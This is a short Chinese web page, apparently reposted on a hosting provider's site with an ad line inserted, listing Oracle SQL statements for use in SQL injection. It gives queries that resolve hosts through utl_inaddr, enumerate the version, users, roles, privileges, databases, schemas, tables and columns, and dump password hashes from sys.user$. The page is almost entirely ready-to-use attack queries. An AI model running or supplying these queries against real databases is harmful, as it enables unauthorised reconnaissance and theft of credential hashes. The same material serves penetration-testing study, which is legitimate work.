OracleSQL注入常用语句
解析IP
select utl_inaddr.get_host_address('google.com') from dual;
成都创新互联公司专业提供德阳服务器托管服务,为用户提供五星数据中心、电信、双线接入解决方案,用户可自行在线购买德阳服务器托管服务,并享受7*24小时金牌售后服务。
获取本机IP地址
select utl_inaddr.get_host_address from dual;
根据IP地址反向解析主机名
select utl_inaddr.get_host_name('10.80.18.241') from dual;
-- list version
select banner from v$version where rownum=1 ; -- oracle version
-- list user
select user from dual; -- current user
select username from user_users; -- current user
select username from all_users; -- all user , the current user can see...
select username from dba_users; -- all user , need pris
-- list role
select role from session_roles; -- current role
-- list privs
select privilege from user_sys_privs; -- privs the current user has
select privilege from role_sys_privs; -- privs the current role has
select privilege from session_privs; -- the all privs that current user has = user_sys_privs + role_sys_privs
select * from dba_sys_privs; -- all user's privs , need privs
-- list password hash
select name, password, astatus from sys.user$; -- password hash <=10g , need privs
select name, password, spare4 from sys.user$; -- password has 11g , need privs
-- list database
select global_name from global_name; -- current database
select sys.database_name from dual; -- current database
select name from v$database; -- current database name , need privs
select instance_name from v$instance; -- current database name , need privs
-- list schemas
select distinct owner from all_tables; -- all schema
-- list tables
select table_name from all_tables where owner='xxx'; -- all table name
-- list columns
select owner,table_name,column_name from all_tab_columns where table_name='xxx';
select owner,table_name,column_name from all_tab_cols where table_name='xxx';
分享文章:OracleSQL注入常用语句
链接地址:http://scyanting.com/article/pijjpe.html